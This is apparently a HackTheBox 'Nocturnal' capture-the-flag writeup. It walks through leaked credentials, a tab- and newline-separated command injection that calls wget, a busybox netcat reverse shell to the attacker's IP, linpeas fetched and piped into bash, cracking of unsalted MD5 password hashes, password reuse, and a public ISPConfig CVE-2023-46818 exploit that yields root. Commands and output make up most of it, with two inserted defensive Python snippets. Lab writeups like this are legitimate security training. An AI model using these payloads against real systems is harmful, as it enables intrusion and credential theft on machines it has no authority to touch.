Web · Easy · Linux

HTB — Nocturnal

ISP file manager path traversal leaks app config with credentials. ISPConfig adduser API abuse leads to root.

May 24, 2025 · HackTheBox
#Path Traversal #ISPConfig #Config Disclosure

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-23 01:54 EDT
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 43.11% done; ETC: 01:55 (0:00:17 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 45.67% done; ETC: 01:55 (0:00:17 remaining)
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.28% done; ETC: 01:55 (0:00:02 remaining)
Nmap scan report for 10.10.11.64
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/23%OT=22%CT=1%CU=43154%PV=Y%DS=2%DC=T%G=Y%TM=6830
OS:0DCD%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=106%GCD=2%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M552ST11NW7%O2=M552S
OS:T11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST11NW7%O6=M552ST11)WIN(W1=
OS:FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=
OS:M552NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)
OS:T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   25.12 ms 10.10.14.1
2   26.12 ms 10.10.11.64
```

80

```sh
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
```

```txt
Dear Amanda,

Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.

The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.

Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,

Nocturnal's IT team
```
  • login with amanda's creds

```sh
test%0abash%09-c%09"wget%09http://10.10.14.9"
```
  • %0a is a URL-encoded newline (\n)
  • %09 is a URL-encoded tab (\t); the shell treats both as word separators, so the command runs without a single literal space
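The separator trick above is worth seeing from the defender's side. The following is an added example (Python, not from the writeup or from the Nocturnal application) that URL-decodes a form body, flags the shell separator characters a space-only filter misses, and shows the hardened shape of a handler: an allowlist on the password and an argv list with no shell. `SHELL_SEPARATORS`, `scan_body`, `build_backup_argv` and the `zip` placeholder command are assumptions; the first sample body is the one from the writeup, the second is constructed.

```python
import re
from urllib.parse import parse_qs

# Characters the shell treats as word separators or command terminators.
# A filter that only blocks the literal space (0x20) is bypassed by tab (0x09)
# and newline (0x0a), which is exactly what %09 and %0a in the payload do.
SHELL_SEPARATORS = frozenset("\n\t\r;|&`$()")


def decoded_params(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into name -> [values]."""
    return parse_qs(body, keep_blank_values=True)


def injection_indicators(value: str) -> list:
    """Return the shell separator characters present in an already-decoded value."""
    return sorted(c for c in set(value) if c in SHELL_SEPARATORS)


def scan_body(body: str) -> dict:
    """Detection: map each parameter whose decoded value carries separators to them."""
    hits = {}
    for name, values in decoded_params(body).items():
        for value in values:
            found = injection_indicators(value)
            if found:
                hits[name] = found
    return hits


# Hardened handler (assumed shape): the password must be printable ASCII with
# no whitespace or control characters, and it reaches the child process as ONE
# argv element with no shell in between. The zip command is a placeholder;
# the page does not show what the real backup feature executes.
PASSWORD_RE = re.compile(r"[\x21-\x7e]{1,128}")


def password_accepted(password: str) -> bool:
    return PASSWORD_RE.fullmatch(password) is not None


def build_backup_argv(password: str, archive: str = "backup.zip") -> list:
    """argv for subprocess.run(argv, shell=False); raises on separator characters."""
    if not password_accepted(password):
        raise ValueError("password contains whitespace or control characters")
    return ["zip", "-r", "-P", password, archive, "."]


# Constructed samples: the body from the writeup beside a benign submission.
SAMPLE_BODIES = [
    'password=test%0abash%09-c%09"wget%09http://10.10.14.9"&backup=',
    "password=Summer2025%21&backup=",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(repr(body), "->", scan_body(body) or "clean")
```

Run as a script it prints the separators found in the writeup's body and reports the benign one as clean; the same `scan_body` check can be run over decoded request bodies from a WAF or application log to spot this bypass pattern.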

Use a busybox reverse shell:

```sh
busybox nc 10.10.14.9 80 -e bash
```
```sh
password=test%0abash%09-c%09"busybox%09nc%0910.10.14.9%0980%09-e%09bash"&backup=
```
```sh
rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.64] 39562
whoami
www-data
```
```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
```sh
www-data@nocturnal:~/nocturnal_database$ ls
ls
nocturnal_database.db
www-data@nocturnal:~/nocturnal_database$ file nocturnal_database.db
file nocturnal_database.db
nocturnal_database.db: SQLite 3.x database, last written using SQLite version 3031001
```
```sh
www-data@nocturnal:~/nocturnal_database$ which sqlite3
which sqlite3
/usr/bin/sqlite3
```
```sh
sqlite> .tables
.tables
uploads  users
```
```sh
sqlite> select * from users;
select * from users;
1|admin|d725aeba...
2|amanda|df8b20aa...
4|tobias|55c82b1c...
6|kavi|f38cde16...
7|e0Al5|101ad454...
8|test|098f6bcd...
```
  • hashes.txt
```txt
d725aeba...
df8b20aa...
55c82b1c...
f38cde16...
101ad454...
098f6bcd...
```
```sh
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

55c82b1c...:slowmotionapocalypse
```
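Why `-m 0` works so well here: mode 0 is raw MD5, and the `test` row's hash starts with `098f6bcd`, the known prefix of md5("test"), so the table stores one unsalted MD5 per password. The following is an added example (Python, not from the writeup) that confirms the scheme against the page's truncated hashes, shows why a single wordlist pass covers every row at once, and puts the remediation beside it: a per-user random salt with PBKDF2-HMAC-SHA256 and a constant-time compare. `LEAKED`, `wordlist_hits`, the `iterations$salt$hash` storage format and the mini wordlist are constructed for the example.

```python
import hashlib
import hmac
import os

# Hash prefixes from the writeup's users table (truncated as on the page), keyed
# to the password hashcat recovered or, for "test", to the md5("test") test vector.
LEAKED = {"098f6bcd": "test", "55c82b1c": "slowmotionapocalypse"}


def md5_hex(password: str) -> str:
    """The scheme the database uses: one unsalted MD5 per password."""
    return hashlib.md5(password.encode()).hexdigest()


def wordlist_hits(hash_prefixes, words) -> dict:
    """With no salt, each candidate is hashed once and compared against every row,
    so the cost of covering all users equals the cost of covering one."""
    by_prefix = {md5_hex(w)[:8]: w for w in words}
    return {p: by_prefix[p] for p in hash_prefixes if p in by_prefix}


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """Remediation: random per-user salt + PBKDF2-HMAC-SHA256.
    Stored as 'iterations$salt_hex$dk_hex' (constructed storage format)."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    words = ["password", "test", "slowmotionapocalypse"]  # constructed mini wordlist
    print("unsalted md5 hits:", wordlist_hits(LEAKED, words))
    a, b = hash_password("test"), hash_password("test")
    print("same password, different stored values:", a != b)
    print("verify correct / wrong:", verify_password("test", a), verify_password("Test", a))
```

The two `hash_password("test")` calls produce different stored values, which is the property the leaked table lacks: identical passwords (and reused ones, like the admin password later in this box) become indistinguishable and crack together.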

creds

```sh
tobias:slowmotionapocalypse
```
```sh
www-data@nocturnal:~/nocturnal.htb$ su tobias
su tobias
Password: slowmotionapocalypse

tobias@nocturnal:/var/www/nocturnal.htb$ whoami
whoami
tobias
```

user.txt

```sh
tobias@nocturnal:~$ ls
user.txt
tobias@nocturnal:~$ cat user.txt
a5fccc5b...
```

priv esc

```sh
tobias@nocturnal:/var/www$ ls
html  ispconfig  nocturnal_database  nocturnal.htb  php-fcgi-scripts
```
```sh
tobias@nocturnal:/var/www$ netstat -tunlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           
```
```sh
tobias@nocturnal:/var/www$ curl http://10.10.14.9/linpeas.sh | bash
```
```sh
ssh -L 8081:localhost:8080 tobias@10.10.11.64
```
  • need to use a private browser window

ISPCONFIG

  • admin:slowmotionapocalypse works (tobias's password, reused)

https://github.com/bipbopbup/CVE-2023-46818-python-exploit/blob/main/exploit.py

```sh
python3 exploit.py http://127.0.0.1:8081/ admin slowmotionapocalypse
[+] Target URL: http://127.0.0.1:8081/
[+] Logging in with username 'admin' and password 'slowmotionapocalypse'
[+] Injecting shell
[+] Launching shell

ispconfig-shell# whoami
root
```

root.txt

```sh
ispconfig-shell# cat /root/root.txt
117e9eab...
```